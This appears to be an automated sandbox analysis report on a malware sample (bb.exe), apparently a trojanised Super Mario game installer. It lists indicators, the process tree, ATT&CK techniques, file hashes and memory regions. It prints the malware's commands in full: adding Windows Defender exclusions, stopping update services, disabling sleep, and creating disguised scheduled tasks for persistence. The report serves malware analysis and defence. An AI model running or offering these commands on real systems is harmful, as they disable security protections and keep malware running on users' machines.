e9cc8222d121a68b6802ff24a84754e117c55ae09d61d54b2bc96ef6fb267a54

Analysis

max time kernel
52s
max time network
78s
platform
windows10-2004_x64
resource
win10v2004-20230221-en
resource tags

arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system
submitted
21-06-2023 07:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bb.exe
Size

41.6MB
MD5

90647ec1bc00c6d35ba3fd7ee214cd20
SHA1

0eb317fb165e87c23770ab6dff45e92dbd209b66
SHA256

e9cc8222d121a68b6802ff24a84754e117c55ae09d61d54b2bc96ef6fb267a54
SHA512

148086f2ac632716f3ede30b93e2a7698af195d8ecb4426bbcb5c1710d37a227edc4d22e071ecb7252465ec91b774cc9c55193b919282ee80bee8befff373c9d
SSDEEP

786432:IewA+hNMs+AMAbd7hLA658F8+T5KLOaDDh/K+LWworfopLzw7FBUGxbtKdcD:I66OqzA6Y8+1KLOaDpKGWC47FBUGucD

Score

10^/10

evasion

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs

Processes:

java.exe

description	pid	process	target process
PID 5056 created 3108	5056	java.exe	Explorer.EXE
PID 5056 created 3108	5056	java.exe	Explorer.EXE
PID 5056 created 3108	5056	java.exe	Explorer.EXE
PID 5056 created 3108	5056	java.exe	Explorer.EXE
PID 5056 created 3108	5056	java.exe	Explorer.EXE

Drops file in Drivers directory 1 IoCs

Processes:

java.exe

description ioc process

File created C:\Windows\System32\drivers\etc\hosts java.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

description	ioc	process
File created	C:\Windows\System32\drivers\etc\hosts	java.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

bb.exeatom.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation	bb.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation	atom.exe

Executes dropped EXE 4 IoCs

Processes:

atom.exejava.exebb.exesuper-mario-forever-v702e.exe

pid process

2648 atom.exe
5056 java.exe
2128 bb.exe
4580 super-mario-forever-v702e.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs

Processes:

atom.exejava.exebb.exedialer.exe

pid process

2648 atom.exe
2648 atom.exe
5056 java.exe
5056 java.exe
2128 bb.exe
2128 bb.exe
656 dialer.exe
656 dialer.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

java.exe

description pid process target process

PID 5056 set thread context of 656 5056 java.exe dialer.exe
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

1284 sc.exe
2460 sc.exe
396 sc.exe
3744 sc.exe
3904 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	pid	process	target process
PID 5056 set thread context of 656	5056	java.exe	dialer.exe

pid	process
1284	sc.exe
2460	sc.exe
396	sc.exe
3744	sc.exe
3904	sc.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

atom.exebb.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	atom.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	atom.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	bb.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	bb.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

4200 schtasks.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

4608 taskkill.exe

pid	process
4200	schtasks.exe

pid	process
4608	taskkill.exe

Modifies registry class 2 IoCs

Processes:

bb.exeatom.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	bb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	atom.exe

NTFS ADS 2 IoCs

Processes:

atom.exe

description	ioc	process
File created	C:\ProgramData\{T7SFJNKV-5JJF-145Z-ZTAB3PW4ZUUD}\bb.exe:Zone.Identifier	atom.exe
File opened for modification	C:\ProgramData\{T7SFJNKV-5JJF-145Z-ZTAB3PW4ZUUD}\bb.exe:Zone.Identifier	atom.exe

Suspicious behavior: EnumeratesProcesses 23 IoCs

Processes:

atom.exebb.exejava.exepowershell.exepowershell.exedialer.exe

pid	process
2648	atom.exe
2648	atom.exe
2648	atom.exe
2648	atom.exe
2128	bb.exe
2128	bb.exe
5056	java.exe
5056	java.exe
5056	java.exe
5056	java.exe
1700	powershell.exe
1700	powershell.exe
5056	java.exe
5056	java.exe
5056	java.exe
5056	java.exe
5056	java.exe
5056	java.exe
5056	java.exe
5056	java.exe
4336	powershell.exe
656	dialer.exe
656	dialer.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

taskkill.exepowershell.exepowercfg.exepowershell.exepowercfg.exe

description	pid	process
Token: SeDebugPrivilege	4608	taskkill.exe
Token: SeDebugPrivilege	1700	powershell.exe
Token: SeShutdownPrivilege	2808	powercfg.exe
Token: SeCreatePagefilePrivilege	2808	powercfg.exe
Token: SeDebugPrivilege	4336	powershell.exe
Token: SeShutdownPrivilege	2420	powercfg.exe
Token: SeCreatePagefilePrivilege	2420	powercfg.exe

Suspicious use of WriteProcessMemory 35 IoCs

Processes:

bb.exeatom.execmd.execmd.exejava.execmd.exe

description	pid	process	target process
PID 4624 wrote to memory of 2648	4624	bb.exe	atom.exe
PID 4624 wrote to memory of 2648	4624	bb.exe	atom.exe
PID 4624 wrote to memory of 2648	4624	bb.exe	atom.exe
PID 4624 wrote to memory of 5056	4624	bb.exe	java.exe
PID 4624 wrote to memory of 5056	4624	bb.exe	java.exe
PID 2648 wrote to memory of 2128	2648	atom.exe	bb.exe
PID 2648 wrote to memory of 2128	2648	atom.exe	bb.exe
PID 2648 wrote to memory of 2128	2648	atom.exe	bb.exe
PID 2648 wrote to memory of 4200	2648	atom.exe	schtasks.exe
PID 2648 wrote to memory of 4200	2648	atom.exe	schtasks.exe
PID 2648 wrote to memory of 4200	2648	atom.exe	schtasks.exe
PID 2648 wrote to memory of 3700	2648	atom.exe	cmd.exe
PID 2648 wrote to memory of 3700	2648	atom.exe	cmd.exe
PID 2648 wrote to memory of 3700	2648	atom.exe	cmd.exe
PID 3700 wrote to memory of 4608	3700	cmd.exe	taskkill.exe
PID 3700 wrote to memory of 4608	3700	cmd.exe	taskkill.exe
PID 3700 wrote to memory of 4608	3700	cmd.exe	taskkill.exe
PID 4624 wrote to memory of 4580	4624	bb.exe	super-mario-forever-v702e.exe
PID 4624 wrote to memory of 4580	4624	bb.exe	super-mario-forever-v702e.exe
PID 4624 wrote to memory of 4580	4624	bb.exe	super-mario-forever-v702e.exe
PID 4092 wrote to memory of 3904	4092	cmd.exe	sc.exe
PID 4092 wrote to memory of 3904	4092	cmd.exe	sc.exe
PID 4092 wrote to memory of 1284	4092	cmd.exe	sc.exe
PID 4092 wrote to memory of 1284	4092	cmd.exe	sc.exe
PID 4092 wrote to memory of 2460	4092	cmd.exe	sc.exe
PID 4092 wrote to memory of 2460	4092	cmd.exe	sc.exe
PID 4092 wrote to memory of 396	4092	cmd.exe	sc.exe
PID 4092 wrote to memory of 396	4092	cmd.exe	sc.exe
PID 4092 wrote to memory of 3744	4092	cmd.exe	sc.exe
PID 4092 wrote to memory of 3744	4092	cmd.exe	sc.exe
PID 5056 wrote to memory of 656	5056	java.exe	dialer.exe
PID 2816 wrote to memory of 2808	2816	cmd.exe	powercfg.exe
PID 2816 wrote to memory of 2808	2816	cmd.exe	powercfg.exe
PID 2816 wrote to memory of 2420	2816	cmd.exe	powercfg.exe
PID 2816 wrote to memory of 2420	2816	cmd.exe	powercfg.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3108

C:\Users\Admin\AppData\Local\Temp\bb.exe
"C:\Users\Admin\AppData\Local\Temp\bb.exe"
2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4624

C:\Users\Admin\AppData\Roaming\atom.exe
"C:\Users\Admin\AppData\Roaming\atom.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2648

C:\ProgramData\{T7SFJNKV-5JJF-145Z-ZTAB3PW4ZUUD}\bb.exe
"C:\ProgramData\{T7SFJNKV-5JJF-145Z-ZTAB3PW4ZUUD}\bb.exe"
4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:2128

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 15 /TN "8EJUE0WZ64JO318P4A" /TR "C:\ProgramData\{T7SFJNKV-5JJF-145Z-ZTAB3PW4ZUUD}\bb.exe" /F
4⤵
- Creates scheduled task(s)
PID:4200

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im atom.exe /f & erase C:\Users\Admin\AppData\Roaming\atom.exe & exit
4⤵
- Suspicious use of WriteProcessMemory
PID:3700

C:\Windows\SysWOW64\taskkill.exe
taskkill /im atom.exe /f
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4608

C:\Users\Admin\AppData\Roaming\java.exe
"C:\Users\Admin\AppData\Roaming\java.exe"
3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5056

C:\Users\Admin\AppData\Roaming\super-mario-forever-v702e.exe
"C:\Users\Admin\AppData\Roaming\super-mario-forever-v702e.exe"
3⤵
- Executes dropped EXE
PID:4580

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1700

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
2⤵
- Suspicious use of WriteProcessMemory
PID:4092

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:3904

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:1284

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:2460

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:396

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:3744

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:2816

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2808

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2420

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
PID:3164

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
PID:2812

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:656

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#pihyngqey#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Oracle Corporation' /tr '''C:\Users\Admin\AppData\Roaming\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Oracle Corporation' -RunLevel 'Highest' -Force; }
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4336

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\{T7SFJNKV-5JJF-145Z-ZTAB3PW4ZUUD}\bb.exe
Filesize
1.2MB

MD5
54d4bcd4e789a196022632e1f0922dd7

SHA1
41ff5729fdeafec9879f12faffa3a62391e0a6f5

SHA256
41d1024209b738785ace023c36b2165d95eab99b0d892327212b8a5f7c311610

SHA512
f07eb73bc7f7bc9e916145d8f63d3190b96be9b224a814cf930be5be3c8269bae5a12cca604ea7576ef6b1e6786251c5178a3950a89aef4f605d6bee05b9bd2e

Download Submit
C:\ProgramData\{T7SFJNKV-5JJF-145Z-ZTAB3PW4ZUUD}\bb.exe
Filesize
1.2MB

MD5
54d4bcd4e789a196022632e1f0922dd7

SHA1
41ff5729fdeafec9879f12faffa3a62391e0a6f5

SHA256
41d1024209b738785ace023c36b2165d95eab99b0d892327212b8a5f7c311610

SHA512
f07eb73bc7f7bc9e916145d8f63d3190b96be9b224a814cf930be5be3c8269bae5a12cca604ea7576ef6b1e6786251c5178a3950a89aef4f605d6bee05b9bd2e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
59d97011e091004eaffb9816aa0b9abd

SHA1
1602a56b01dd4b7c577ca27d3117e4bcc1aa657b

SHA256
18f381e0db020a763b8c515c346ef58679ab9c403267eacfef5359e272f7e71d

SHA512
d9ca49c1a17580981e2c1a50d73c0eecaa7a62f8514741512172e395af2a3d80aeb0f71c58bc7f52c18246d57ba67af09b6bff4776877d6cc6f0245c30e092d6

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_q21w2u1v.ztm.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\atom.exe
Filesize
1.2MB

MD5
54d4bcd4e789a196022632e1f0922dd7

SHA1
41ff5729fdeafec9879f12faffa3a62391e0a6f5

SHA256
41d1024209b738785ace023c36b2165d95eab99b0d892327212b8a5f7c311610

SHA512
f07eb73bc7f7bc9e916145d8f63d3190b96be9b224a814cf930be5be3c8269bae5a12cca604ea7576ef6b1e6786251c5178a3950a89aef4f605d6bee05b9bd2e

Download Submit
C:\Users\Admin\AppData\Roaming\atom.exe
Filesize
1.2MB

MD5
54d4bcd4e789a196022632e1f0922dd7

SHA1
41ff5729fdeafec9879f12faffa3a62391e0a6f5

SHA256
41d1024209b738785ace023c36b2165d95eab99b0d892327212b8a5f7c311610

SHA512
f07eb73bc7f7bc9e916145d8f63d3190b96be9b224a814cf930be5be3c8269bae5a12cca604ea7576ef6b1e6786251c5178a3950a89aef4f605d6bee05b9bd2e

Download Submit
C:\Users\Admin\AppData\Roaming\atom.exe
Filesize
1.2MB

MD5
54d4bcd4e789a196022632e1f0922dd7

SHA1
41ff5729fdeafec9879f12faffa3a62391e0a6f5

SHA256
41d1024209b738785ace023c36b2165d95eab99b0d892327212b8a5f7c311610

SHA512
f07eb73bc7f7bc9e916145d8f63d3190b96be9b224a814cf930be5be3c8269bae5a12cca604ea7576ef6b1e6786251c5178a3950a89aef4f605d6bee05b9bd2e

Download Submit
C:\Users\Admin\AppData\Roaming\java.exe
Filesize
10.3MB

MD5
abbf1ee343b1cdc834be281caef875c8

SHA1
b72ffd7f63d4ad1de95783b7cf1ecb89cdb0056b

SHA256
1f479a220e41be1c22092d76400565d0f7d8e890d1069a2f8bbdc5f697d9808f

SHA512
8304d1d0534095024b8a3718d435b644d55a05d0a78d1b9b39fc28400081b188be021f3348e6a1e0a826b04af8d4bdb9fbee21aeede81f824e1b8f9ea0018c64

Download Submit
C:\Users\Admin\AppData\Roaming\java.exe
Filesize
10.3MB

MD5
abbf1ee343b1cdc834be281caef875c8

SHA1
b72ffd7f63d4ad1de95783b7cf1ecb89cdb0056b

SHA256
1f479a220e41be1c22092d76400565d0f7d8e890d1069a2f8bbdc5f697d9808f

SHA512
8304d1d0534095024b8a3718d435b644d55a05d0a78d1b9b39fc28400081b188be021f3348e6a1e0a826b04af8d4bdb9fbee21aeede81f824e1b8f9ea0018c64

Download Submit
C:\Users\Admin\AppData\Roaming\java.exe
Filesize
10.3MB

MD5
abbf1ee343b1cdc834be281caef875c8

SHA1
b72ffd7f63d4ad1de95783b7cf1ecb89cdb0056b

SHA256
1f479a220e41be1c22092d76400565d0f7d8e890d1069a2f8bbdc5f697d9808f

SHA512
8304d1d0534095024b8a3718d435b644d55a05d0a78d1b9b39fc28400081b188be021f3348e6a1e0a826b04af8d4bdb9fbee21aeede81f824e1b8f9ea0018c64

Download Submit
C:\Users\Admin\AppData\Roaming\super-mario-forever-v702e.exe
Filesize
29.9MB

MD5
f49bcdaa9c2858eff912fc20d6fff31b

SHA1
501e231234e80b384b38bde7597ca1f24d02da6d

SHA256
0da2f66a5e6281c4dbe8e8c17b963a4d38aa02ba17364cd97f47f9e6f380b69b

SHA512
c21cde8b463e21dbb8d29509d11e948ea34ce2644363b424e08dd73c03ec348b8afbe05058a12d452d99b0e19c8e375c33f9a6f124f0514e0cd0c86976c73e69

Download Submit
C:\Users\Admin\AppData\Roaming\super-mario-forever-v702e.exe
Filesize
29.9MB

MD5
f49bcdaa9c2858eff912fc20d6fff31b

SHA1
501e231234e80b384b38bde7597ca1f24d02da6d

SHA256
0da2f66a5e6281c4dbe8e8c17b963a4d38aa02ba17364cd97f47f9e6f380b69b

SHA512
c21cde8b463e21dbb8d29509d11e948ea34ce2644363b424e08dd73c03ec348b8afbe05058a12d452d99b0e19c8e375c33f9a6f124f0514e0cd0c86976c73e69

Download Submit
C:\Users\Admin\AppData\Roaming\super-mario-forever-v702e.exe
Filesize
29.9MB

MD5
f49bcdaa9c2858eff912fc20d6fff31b

SHA1
501e231234e80b384b38bde7597ca1f24d02da6d

SHA256
0da2f66a5e6281c4dbe8e8c17b963a4d38aa02ba17364cd97f47f9e6f380b69b

SHA512
c21cde8b463e21dbb8d29509d11e948ea34ce2644363b424e08dd73c03ec348b8afbe05058a12d452d99b0e19c8e375c33f9a6f124f0514e0cd0c86976c73e69

Download Submit
memory/64-362-0x00007FF84F990000-0x00007FF84F9A0000-memory.dmp

Filesize
64KB

Download
memory/64-358-0x0000025E77630000-0x0000025E77657000-memory.dmp

Filesize
156KB

Download
memory/64-380-0x0000025E77630000-0x0000025E77657000-memory.dmp

Filesize
156KB

Download
memory/528-366-0x00000161F90E0000-0x00000161F9107000-memory.dmp

Filesize
156KB

Download
memory/528-367-0x00007FF84F990000-0x00007FF84F9A0000-memory.dmp

Filesize
64KB

Download
memory/528-384-0x00000161F90E0000-0x00000161F9107000-memory.dmp

Filesize
156KB

Download
memory/592-373-0x0000027A2E9D0000-0x0000027A2E9F7000-memory.dmp

Filesize
156KB

Download
memory/592-348-0x00007FF84F990000-0x00007FF84F9A0000-memory.dmp

Filesize
64KB

Download
memory/592-347-0x0000027A2E9D0000-0x0000027A2E9F7000-memory.dmp

Filesize
156KB

Download
memory/592-345-0x0000027A2E820000-0x0000027A2E841000-memory.dmp

Filesize
132KB

Download
memory/656-356-0x00007FF747940000-0x00007FF747BBE000-memory.dmp

Filesize
2.5MB

Download
memory/656-330-0x00007FF88FB10000-0x00007FF88FB12000-memory.dmp

Filesize
8KB

Download
memory/656-331-0x00007FF747940000-0x00007FF747BBE000-memory.dmp

Filesize
2.5MB

Download
memory/656-342-0x00007FF88F910000-0x00007FF88FB05000-memory.dmp

Filesize
2.0MB

Download
memory/656-343-0x00007FF88ED70000-0x00007FF88EE2E000-memory.dmp

Filesize
760KB

Download
memory/676-349-0x00000275ABD20000-0x00000275ABD47000-memory.dmp

Filesize
156KB

Download
memory/676-375-0x00000275ABD20000-0x00000275ABD47000-memory.dmp

Filesize
156KB

Download
memory/676-352-0x00007FF84F990000-0x00007FF84F9A0000-memory.dmp

Filesize
64KB

Download
memory/720-387-0x0000017A77F60000-0x0000017A77F87000-memory.dmp

Filesize
156KB

Download
memory/720-376-0x0000017A77F60000-0x0000017A77F87000-memory.dmp

Filesize
156KB

Download
memory/720-379-0x00007FF84F990000-0x00007FF84F9A0000-memory.dmp

Filesize
64KB

Download
memory/952-377-0x000001F9DC1D0000-0x000001F9DC1F7000-memory.dmp

Filesize
156KB

Download
memory/952-361-0x00007FF84F990000-0x00007FF84F9A0000-memory.dmp

Filesize
64KB

Download
memory/952-357-0x000001F9DC1D0000-0x000001F9DC1F7000-memory.dmp

Filesize
156KB

Download
memory/1036-382-0x000001EB446C0000-0x000001EB446E7000-memory.dmp

Filesize
156KB

Download
memory/1036-386-0x00007FF84F990000-0x00007FF84F9A0000-memory.dmp

Filesize
64KB

Download
memory/1036-442-0x000001EB446C0000-0x000001EB446E7000-memory.dmp

Filesize
156KB

Download
memory/1064-389-0x00007FF84F990000-0x00007FF84F9A0000-memory.dmp

Filesize
64KB

Download
memory/1064-391-0x00000234EA560000-0x00000234EA587000-memory.dmp

Filesize
156KB

Download
memory/1064-385-0x00000234EA560000-0x00000234EA587000-memory.dmp

Filesize
156KB

Download
memory/1128-388-0x000002689E520000-0x000002689E547000-memory.dmp

Filesize
156KB

Download
memory/1128-392-0x00007FF84F990000-0x00007FF84F9A0000-memory.dmp

Filesize
64KB

Download
memory/1128-394-0x000002689E520000-0x000002689E547000-memory.dmp

Filesize
156KB

Download
memory/1148-447-0x000001C11F1D0000-0x000001C11F1F7000-memory.dmp

Filesize
156KB

Download
memory/1148-398-0x00007FF84F990000-0x00007FF84F9A0000-memory.dmp

Filesize
64KB

Download
memory/1148-397-0x000001C11F1D0000-0x000001C11F1F7000-memory.dmp

Filesize
156KB

Download
memory/1180-453-0x000002C1A3400000-0x000002C1A3427000-memory.dmp

Filesize
156KB

Download
memory/1372-461-0x000001FFEAC80000-0x000001FFEACA7000-memory.dmp

Filesize
156KB

Download
memory/1700-320-0x000002DEF5730000-0x000002DEF5740000-memory.dmp

Filesize
64KB

Download
memory/1700-318-0x000002DEDD1B0000-0x000002DEDD1D2000-memory.dmp

Filesize
136KB

Download
memory/1700-319-0x000002DEF5730000-0x000002DEF5740000-memory.dmp

Filesize
64KB

Download
memory/2128-243-0x0000000000400000-0x0000000000637000-memory.dmp

Filesize
2.2MB

Download
memory/2128-242-0x00000000007A0000-0x00000000007A1000-memory.dmp

Filesize
4KB

Download
memory/2648-167-0x0000000000400000-0x0000000000637000-memory.dmp

Filesize
2.2MB

Download
memory/2648-166-0x0000000000750000-0x0000000000751000-memory.dmp

Filesize
4KB

Download
memory/4336-353-0x0000022DCC350000-0x0000022DCC360000-memory.dmp

Filesize
64KB

Download
memory/4336-363-0x0000022DCC350000-0x0000022DCC360000-memory.dmp

Filesize
64KB

Download
memory/4336-360-0x0000022DCC390000-0x0000022DCC5AC000-memory.dmp

Filesize
2.1MB

Download
memory/4336-371-0x0000022DCC350000-0x0000022DCC360000-memory.dmp

Filesize
64KB

Download
memory/5056-247-0x00007FF88FB20000-0x00007FF88FB22000-memory.dmp

Filesize
8KB

Download
memory/5056-248-0x0000000140000000-0x000000014143A000-memory.dmp

Filesize
20.2MB

Download
memory/5056-246-0x00007FF88FB10000-0x00007FF88FB12000-memory.dmp

Filesize
8KB

Download